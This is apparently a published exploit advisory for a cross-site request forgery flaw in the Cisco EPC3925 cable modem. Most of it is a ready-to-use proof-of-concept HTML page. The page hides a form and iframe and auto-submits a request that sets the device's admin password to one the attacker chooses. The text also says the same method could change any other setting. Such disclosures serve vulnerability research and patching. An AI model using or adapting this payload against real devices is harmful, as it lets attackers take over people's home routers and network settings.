####################################################################### # Exploit Title: Cisco EPC3925 Cross Site Request Forgery # Google Dork: N/A # Date: 12-11-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.cisco.com # Software Link: Not public # Version: epc3925-E10-5-v302r125572-130520c # Tested on: Cisco EPC3925 # CVE: N/A ####################################################################### # Description: # # This proof of concept demonstrates that the admin password can be # changed by an attacker in a CSRF attack. However, it seems like any # setting in the device can be manipulated using an attack like this. # # # Side note: The device does not ask for the current password. # # # Location: # # POST http://[target]/goform/Quick_setup # # Parameters: # # Password=&PasswordReEnter=&save=Save+Settings # # PoC: # # <html> # # <form name="reseller" method="POST" action="http://[target]/goform/Quick_setup" id="csrf_attack" target="csrf_iframe"> # <input type="hidden" name="Password" value="attackers_password"> # <input type="hidden" name="PasswordReEnter" value="attackers_password"> # <input type="hidden" name="save" value="Save Settings"> # </form> # # <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe> # # <script> # document.getElementById('csrf_attack').submit(); # </script> # <center>The payload has been executed....</center> # # </html> # # Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/